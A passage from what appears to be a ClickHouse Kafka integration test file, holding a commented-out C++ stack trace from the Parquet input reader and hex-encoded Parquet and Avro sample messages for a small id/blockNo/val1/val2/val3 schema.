# /src/Processors/Formats/Impl/ParquetBlockInputFormat.cpp:95: DB::registerInputFormatProcessorParquet(DB::FormatFactory&)::$_0::operator()(DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) const @ 0x1df2cec7 in /usr/bin/clickhouse
# /contrib/libcxx/include/type_traits:3519: decltype(std::__1::forward<DB::registerInputFormatProcessorParquet(DB::FormatFactory&)::$_0&>(fp)(std::__1::forward<DB::ReadBuffer&>(fp0), std::__1::forward<DB::Block const&>(fp0), std::__1::forward<DB::RowInputFormatParams const&>(fp0), std::__1::forward<DB::FormatSettings const&>(fp0))) std::__1::__invoke<DB::registerInputFormatProcessorParquet(DB::FormatFactory&)::$_0&, DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&>(DB::registerInputFormatProcessorParquet(DB::FormatFactory&)::$_0&, DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) @ 0x1df2ce6a in /usr/bin/clickhouse
# /contrib/libcxx/include/__functional_base:317: std::__1::shared_ptr<DB::IInputFormat> std::__1::__invoke_void_return_wrapper<std::__1::shared_ptr<DB::IInputFormat> >::__call<DB::registerInputFormatProcessorParquet(DB::FormatFactory&)::$_0&, DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&>(DB::registerInputFormatProcessorParquet(DB::FormatFactory&)::$_0&, DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) @ 0x1df2cd7d in /usr/bin/clickhouse
# /contrib/libcxx/include/functional:1540: std::__1::__function::__alloc_func<DB::registerInputFormatProcessorParquet(DB::FormatFactory&)::$_0, std::__1::allocator<DB::registerInputFormatProcessorParquet(DB::FormatFactory&)::$_0>, std::__1::shared_ptr<DB::IInputFormat> (DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&)>::operator()(DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) @ 0x1df2ccda in /usr/bin/clickhouse
# /contrib/libcxx/include/functional:1714: std::__1::__function::__func<DB::registerInputFormatProcessorParquet(DB::FormatFactory&)::$_0, std::__1::allocator<DB::registerInputFormatProcessorParquet(DB::FormatFactory&)::$_0>, std::__1::shared_ptr<DB::IInputFormat> (DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&)>::operator()(DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) @ 0x1df2bdec in /usr/bin/clickhouse
# /contrib/libcxx/include/functional:1867: std::__1::__function::__value_func<std::__1::shared_ptr<DB::IInputFormat> (DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&)>::operator()(DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) const @ 0x1dd14dbd in /usr/bin/clickhouse
# /contrib/libcxx/include/functional:2473: std::__1::function<std::__1::shared_ptr<DB::IInputFormat> (DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&)>::operator()(DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) const @ 0x1dd07035 in /usr/bin/clickhouse
# /src/Formats/FormatFactory.cpp:258: DB::FormatFactory::getInputFormat(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > const&, DB::ReadBuffer&, DB::Block const&, DB::Context const&, unsigned long, std::__1::function<void ()>) const @ 0x1dd04007 in /usr/bin/clickhouse
# /src/Storages/Kafka/KafkaBlockInputStream.cpp:76: DB::KafkaBlockInputStream::readImpl() @ 0x1d8f6559 in /usr/bin/clickhouse
# /src/DataStreams/IBlockInputStream.cpp:60: DB::IBlockInputStream::read() @ 0x1c9c92fd in /usr/bin/clickhouse
# /src/DataStreams/copyData.cpp:26: void DB::copyDataImpl<DB::copyData(DB::IBlockInputStream&, DB::IBlockOutputStream&, std::__1::atomic<bool>*)::$_0&, void (&)(DB::Block const&)>(DB::IBlockInputStream&, DB::IBlockOutputStream&, DB::copyData(DB::IBlockInputStream&, DB::IBlockOutputStream&, std::__1::atomic<bool>*)::$_0&, void (&)(DB::Block const&)) @ 0x1c9ea01c in /usr/bin/clickhouse
# /src/DataStreams/copyData.cpp:63: DB::copyData(DB::IBlockInputStream&, DB::IBlockOutputStream&, std::__1::atomic<bool>*) @ 0x1c9e9fc7 in /usr/bin/clickhouse
# /src/Storages/Kafka/StorageKafka.cpp:565: DB::StorageKafka::streamToViews() @ 0x1d8cc3fa in /usr/bin/clickhouse
# # 'data_sample' : [
# # b'\x50\x41\x52\x31\x15\x04\x15\x10\x15\x14\x4c\x15\x02\x15\x04\x12\x00\x00\x08\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xbc\x01\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x02\x16\xac\x01\x16\xb4\x01\x26\x38\x26\x08\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xc8\x03\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xfc\x02\x26\xd4\x02\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x0c\x15\x10\x4c\x15\x02\x15\x04\x12\x00\x00\x06\x14\x02\x00\x00\x00\x41\x4d\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x03\x08\x01\x02\x00\x26\xa2\x05\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x02\x16\x68\x16\x70\x26\xde\x04\x26\xb2\x04\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x3f\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x03\x08\x01\x02\x00\x26\x8a\x07\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x02\x16\x84\x01\x16\x8c\x01\x26\xa6\x06\x26\xfe\x05\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x01\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xfe\x08\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xb2\x08\x26\x8a\x08\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x15\x02\x19\x6c\x35\x00\x18\x06\x73\x63\x68\x65\x6d\x61\x15\x0a\x00\x15\x04\x25\x00\x18\x02\x69\x64\x00\x15\x02\x25\x00\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x25\x18\x4c\xac\x13\x10\x12\x00\x00\x00\x15\x0c\x25\x00\x18\x04\x76\x61\x6c\x31\x25\x00\x4c\x1c\x00\x00\x00\x15\x08\x25\x00\x18\x04\x76\x61\x6c\x32\x00\x15\x02\x25\x00\x18\x04\x76\x61\x6c\x33\x25\x16\x4c\xac\x13\x08\x12\x00\x00\x00\x16\x02\x19\x1c\x19\x5c\x26\xbc\x01\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x02\x16\xac\x01\x16\xb4\x01\x26\x38\x26\x08\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x26\xc8\x03\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xfc\x02\x26\xd4\x02\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x26\xa2\x05\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x02\x16\x68\x16\x70\x26\xde\x04\x26\xb2\x04\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x26\x8a\x07\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x02\x16\x84\x01\x16\x8c\x01\x26\xa6\x06\x26\xfe\x05\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x26\xfe\x08\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xb2\x08\x26\x8a\x08\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x16\x98\x05\x16\x02\x00\x28\x22\x70\x61\x72\x71\x75\x65\x74\x2d\x63\x70\x70\x20\x76\x65\x72\x73\x69\x6f\x6e\x20\x31\x2e\x35\x2e\x31\x2d\x53\x4e\x41\x50\x53\x48\x4f\x54\x19\x5c\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x00\xc4\x01\x00\x00\x50\x41\x52\x31',
# # b'\x50\x41\x52\x31\x15\x04\x15\xf0\x01\x15\x90\x01\x4c\x15\x1e\x15\x04\x12\x00\x00\x78\x04\x01\x00\x09\x01\x00\x02\x09\x07\x04\x00\x03\x0d\x08\x00\x04\x0d\x08\x00\x05\x0d\x08\x00\x06\x0d\x08\x00\x07\x0d\x08\x00\x08\x0d\x08\x00\x09\x0d\x08\x00\x0a\x0d\x08\x00\x0b\x0d\x08\x00\x0c\x0d\x08\x00\x0d\x0d\x08\x3c\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x15\x00\x15\x14\x15\x18\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x18\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x24\x04\x05\x10\x32\x54\x76\x98\xba\xdc\x0e\x26\xca\x02\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x1e\x16\x9e\x03\x16\xc2\x02\x26\xb8\x01\x26\x08\x1c\x18\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x1e\x00\x26\xd8\x04\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x1e\x16\x6c\x16\x74\x26\x8c\x04\x26\xe4\x03\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x0c\x15\x10\x4c\x15\x02\x15\x04\x12\x00\x00\x06\x14\x02\x00\x00\x00\x41\x4d\x15\x00\x15\x06\x15\x0a\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x03\x08\x01\x1e\x00\x26\xb2\x06\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x1e\x16\x68\x16\x70\x26\xee\x05\x26\xc2\x05\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x3f\x15\x00\x15\x06\x15\x0a\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x03\x08\x01\x1e\x00\x26\x9a\x08\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x1e\x16\x84\x01\x16\x8c\x01\x26\xb6\x07\x26\x8e\x07\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x01\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x03\x08\x01\x1e\x00\x26\x8e\x0a\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x1e\x16\x6c\x16\x74\x26\xc2\x09\x26\x9a\x09\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x15\x02\x19\x6c\x35\x00\x18\x06\x73\x63\x68\x65\x6d\x61\x15\x0a\x00\x15\x04\x25\x00\x18\x02\x69\x64\x00\x15\x02\x25\x00\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x25\x18\x4c\xac\x13\x10\x12\x00\x00\x00\x15\x0c\x25\x00\x18\x04\x76\x61\x6c\x31\x25\x00\x4c\x1c\x00\x00\x00\x15\x08\x25\x00\x18\x04\x76\x61\x6c\x32\x00\x15\x02\x25\x00\x18\x04\x76\x61\x6c\x33\x25\x16\x4c\xac\x13\x08\x12\x00\x00\x00\x16\x1e\x19\x1c\x19\x5c\x26\xca\x02\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x1e\x16\x9e\x03\x16\xc2\x02\x26\xb8\x01\x26\x08\x1c\x18\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x26\xd8\x04\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x1e\x16\x6c\x16\x74\x26\x8c\x04\x26\xe4\x03\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x26\xb2\x06\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x1e\x16\x68\x16\x70\x26\xee\x05\x26\xc2\x05\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x26\x9a\x08\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x1e\x16\x84\x01\x16\x8c\x01\x26\xb6\x07\x26\x8e\x07\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x26\x8e\x0a\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x1e\x16\x6c\x16\x74\x26\xc2\x09\x26\x9a\x09\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x16\xa6\x06\x16\x1e\x00\x28\x22\x70\x61\x72\x71\x75\x65\x74\x2d\x63\x70\x70\x20\x76\x65\x72\x73\x69\x6f\x6e\x20\x31\x2e\x35\x2e\x31\x2d\x53\x4e\x41\x50\x53\x48\x4f\x54\x19\x5c\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x00\xc5\x01\x00\x00\x50\x41\x52\x31',
# # b'\x50\x41\x52\x31\x15\x04\x15\x10\x15\x14\x4c\x15\x02\x15\x04\x12\x00\x00\x08\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xbc\x01\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x02\x16\xac\x01\x16\xb4\x01\x26\x38\x26\x08\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xc8\x03\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xfc\x02\x26\xd4\x02\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x0c\x15\x10\x4c\x15\x02\x15\x04\x12\x00\x00\x06\x14\x02\x00\x00\x00\x41\x4d\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x03\x08\x01\x02\x00\x26\xa2\x05\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x02\x16\x68\x16\x70\x26\xde\x04\x26\xb2\x04\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x3f\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x03\x08\x01\x02\x00\x26\x8a\x07\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x02\x16\x84\x01\x16\x8c\x01\x26\xa6\x06\x26\xfe\x05\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x01\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xfe\x08\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xb2\x08\x26\x8a\x08\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x15\x02\x19\x6c\x35\x00\x18\x06\x73\x63\x68\x65\x6d\x61\x15\x0a\x00\x15\x04\x25\x00\x18\x02\x69\x64\x00\x15\x02\x25\x00\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x25\x18\x4c\xac\x13\x10\x12\x00\x00\x00\x15\x0c\x25\x00\x18\x04\x76\x61\x6c\x31\x25\x00\x4c\x1c\x00\x00\x00\x15\x08\x25\x00\x18\x04\x76\x61\x6c\x32\x00\x15\x02\x25\x00\x18\x04\x76\x61\x6c\x33\x25\x16\x4c\xac\x13\x08\x12\x00\x00\x00\x16\x02\x19\x1c\x19\x5c\x26\xbc\x01\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x02\x16\xac\x01\x16\xb4\x01\x26\x38\x26\x08\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x26\xc8\x03\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xfc\x02\x26\xd4\x02\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x26\xa2\x05\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x02\x16\x68\x16\x70\x26\xde\x04\x26\xb2\x04\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x26\x8a\x07\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x02\x16\x84\x01\x16\x8c\x01\x26\xa6\x06\x26\xfe\x05\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x26\xfe\x08\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xb2\x08\x26\x8a\x08\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x16\x98\x05\x16\x02\x00\x28\x22\x70\x61\x72\x71\x75\x65\x74\x2d\x63\x70\x70\x20\x76\x65\x72\x73\x69\x6f\x6e\x20\x31\x2e\x35\x2e\x31\x2d\x53\x4e\x41\x50\x53\x48\x4f\x54\x19\x5c\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x00\xc4\x01\x00\x00\x50\x41\x52\x31',
# # ''
# # ],
# },
# 'Avro' : {
# 'data_sample' : [
# b'\x4f\x62\x6a\x01\x04\x16\x61\x76\x72\x6f\x2e\x73\x63\x68\x65\x6d\x61\x82\x03\x7b\x22\x74\x79\x70\x65\x22\x3a\x22\x72\x65\x63\x6f\x72\x64\x22\x2c\x22\x6e\x61\x6d\x65\x22\x3a\x22\x72\x6f\x77\x22\x2c\x22\x66\x69\x65\x6c\x64\x73\x22\x3a\x5b\x7b\x22\x6e\x61\x6d\x65\x22\x3a\x22\x69\x64\x22\x2c\x22\x74\x79\x70\x65\x22\x3a\x22\x6c\x6f\x6e\x67\x22\x7d\x2c\x7b\x22\x6e\x61\x6d\x65\x22\x3a\x22\x62\x6c\x6f\x63\x6b\x4e\x6f\x22\x2c\x22\x74\x79\x70\x65\x22\x3a\x22\x69\x6e\x74\x22\x7d\x2c\x7b\x22\x6e\x61\x6d\x65\x22\x3a\x22\x76\x61\x6c\x31\x22\x2c\x22\x74\x79\x70\x65\x22\x3a\x22\x73\x74\x72\x69\x6e\x67\x22\x7d\x2c\x7b\x22\x6e\x61\x6d\x65\x22\x3a\x22\x76\x61\x6c\x32\x22\x2c\x22\x74\x79\x70\x65\x22\x3a\x22\x66\x6c\x6f\x61\x74\x22\x7d\x2c\x7b\x22\x6e\x61\x6d\x65\x22\x3a\x22\x76\x61\x6c\x33\x22\x2c\x22\x74\x79\x70\x65\x22\x3a\x22\x69\x6e\x74\x22\x7d\x5d\x7d\x14\x61\x76\x72\x6f\x2e\x63\x6f\x64\x65\x63\x08\x6e\x75\x6c\x6c\x00\x8d\x1f\xf2\x17\x71\xa4\x2e\xe4\xc9\x0a\x23\x67\x12\xaa\xc6\xc0\x02\x14\x00\x00\x04\x41\x4d\x00\x00\x00\x3f\x02\x8d\x1f\xf2\x17\x71\xa4\x2e\xe4\xc9\x0a\x23\x67\x12\xaa\xc6\xc0',
# b'\x4f\x62\x6a\x01\x04\x16\x61\x76\x72\x6f\x2e\x73\x63\x68\x65\x6d\x61\x82\x03\x7b\x22\x74\x79\x70\x65\x22\x3a\x22\x72\x65\x63\x6f\x72\x64\x22\x2c\x22\x6e\x61\x6d\x65\x22\x3a\x22\x72\x6f\x77\x22\x2c\x22\x66\x69\x65\x6c\x64\x73\x22\x3a\x5b\x7b\x22\x6e\x61\x6d\x65\x22\x3a\x22\x69\x64\x22\x2c\x22\x74\x79\x70\x65\x22\x3a\x22\x6c\x6f\x6e\x67\x22\x7d\x2c\x7b\x22\x6e\x61\x6d\x65\x22\x3a\x22\x62\x6c\x6f\x63\x6b\x4e\x6f\x22\x2c\x22\x74\x79\x70\x65\x22\x3a\x22\x69\x6e\x74\x22\x7d\x2c\x7b\x22\x6e\x61\x6d\x65\x22\x3a\x22\x76\x61\x6c\x31\x22\x2c\x22\x74\x79\x70\x65\x22\x3a\x22\x73\x74\x72\x69\x6e\x67\x22\x7d\x2c\x7b\x22\x6e\x61\x6d\x65\x22\x3a\x22\x76\x61\x6c\x32\x22\x2c\x22\x74\x79\x70\x65\x22\x3a\x22\x66\x6c\x6f\x61\x74\x22\x7d\x2c\x7b\x22\x6e\x61\x6d\x65\x22\x3a\x22\x76\x61\x6c\x33\x22\x2c\x22\x74\x79\x70\x65\x22\x3a\x22\x69\x6e\x74\x22\x7d\x5d\x7d\x14\x61\x76\x72\x6f\x2e\x63\x6f\x64\x65\x63\x08\x6e\x75\x6c\x6c\x00\xeb\x9d\x51\x82\xf2\x11\x3d\x0b\xc5\x92\x97\xb2\x07\x6d\x72\x5a\x1e\xac\x02\x02\x00\x04\x41\x4d\x00\x00\x00\x3f\x02\x04\x00\x04\x41\x4d\x00\x00\x00\x3f\x02\x06\x00\x04\x41\x4d\x00\x00\x00\x3f\x02\x08\x00\x04\x41\x4d\x00\x00\x00\x3f\x02\x0a\x00\x04\x41\x4d\x00\x00\x00\x3f\x02\x0c\x00\x04\x41\x4d\x00\x00\x00\x3f\x02\x0e\x00\x04\x41\x4d\x00\x00\x00\x3f\x02\x10\x00\x04\x41\x4d\x00\x00\x00\x3f\x02\x12\x00\x04\x41\x4d\x00\x00\x00\x3f\x02\x14\x00\x04\x41\x4d\x00\x00\x00\x3f\x02\x16\x